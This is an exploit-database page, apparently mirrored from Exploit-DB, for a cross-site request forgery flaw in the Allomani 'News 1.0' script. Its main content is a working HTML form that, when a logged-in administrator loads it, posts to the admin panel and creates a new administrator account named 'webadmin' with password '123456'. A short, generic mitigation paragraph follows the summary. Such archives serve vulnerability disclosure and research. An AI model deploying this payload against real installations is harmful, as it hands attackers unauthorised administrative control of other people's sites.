header-logo
Suggest Exploit
vendor:
News 1.0
by:
AtT4CKxT3rR0r1ST
5.5
CVSS
MEDIUM
XSRF
CWE
Product Name: News 1.0
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

News 1.0 XSRF Vulnerability (Add Admin)

This exploit allows an attacker to add an admin user to the News 1.0 system without proper authorization. The exploit consists of a form that sends a POST request to http://localhost/News/admin/index.php with the necessary parameters to add a new user with admin privileges. The parameters include the username, password, email, and group ID. The attacker can modify these parameters to add any desired user.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper authorization and authentication mechanisms in the application. Additionally, input validation should be performed on all user-supplied data to prevent malicious actions.
Source

Exploit-DB raw data:

News 1.0 XSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://allomani.com/en/news_script.html
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/News/admin/index.php">
<input type="hidden" name="action" value="adduserok"/>
<input type="hidden" name="hash" value="e10adc3949ba59abbe56e057f20f883e"/>
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="Example@hotmail.com"/>
<input type="hidden" name="group_id" value="1"/>
<input type="hidden" name="useraddbutton" value="Add"/>
</form>

</body>
</html>
####################################################################